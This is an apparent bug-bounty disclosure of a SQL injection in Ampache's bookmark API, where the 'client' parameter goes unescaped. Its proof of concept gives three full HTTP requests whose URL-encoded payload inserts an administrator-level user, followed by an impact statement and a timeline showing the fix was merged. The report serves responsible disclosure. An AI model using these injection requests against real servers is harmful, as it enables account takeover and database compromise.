SQL Injection in ampache/ampache

Valid

Reported on

Oct 15th 2021


Description

The application does not validate and escape the client parameter before using it in a SQL statement at get_bookmark function in Repository/Model/Bookmark.php file, leading to a SQL Injection The function named get_bookmark which called by in 3 functions: bookmark_create, bookmark_edit and bookmark_delete. Those functions are getting data from $input['client'] parameter without validate

Proof of Concept

Example add a new user named "inval1d":

Inject in bookmark_edit

GET /server/xml.server.php?action=bookmark_edit&auth=e545492334861dab126165bda968148a&filter=1&position=1&type=song&client=1%27%3b+INSERT+INTO+user+(username,access)+VALUES+(%27inval1d%27,%27100%27)%3b%27 HTTP/1.1
Host: 127.0.0.1:8002
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Referer: http://127.0.0.1:8002/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Inject in bookmark_create

GET /server/xml.server.php?action=bookmark_create&auth=49a468855c03e7ce5cdc6aa2d6df7a12&filter=1&position=1&type=song&client=1%27%3b+INSERT+INTO+user+(username,access)+VALUES+(%27inval1d%27,%27100%27)%3b%27 HTTP/1.1
Host: 127.0.0.1:8002
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Referer: http://127.0.0.1:8002/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Inject in bookmark_delete

GET /server/xml.server.php?action=bookmark_delete&auth=49a468855c03e7ce5cdc6aa2d6df7a12&filter=1&position=1&type=song&client=1%27%3b+INSERT+INTO+user+(username,access)+VALUES+(%27inval1d%27,%27100%27)%3b%27 HTTP/1.1
Host: 127.0.0.1:8002
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Referer: http://127.0.0.1:8002/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Impact

Vulnerability allows authenticated users to perform SQL injection. A successful attack may result the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, write file to server lead to Remote code Execute, or write a script to extract data.

We have contacted a member of the ampache team and are waiting to hear back 2 months ago
We have contacted a member of the ampache team and are waiting to hear back 2 months ago
lachlan validated this vulnerability a month ago
laladee has been awarded the disclosure bounty
The fix bounty is now up for grabs
lachlan confirmed that a fix has been merged on 55a523 a month ago
lachlan has been awarded the fix bounty
BookmarkEditMethod.php#L68 has been validated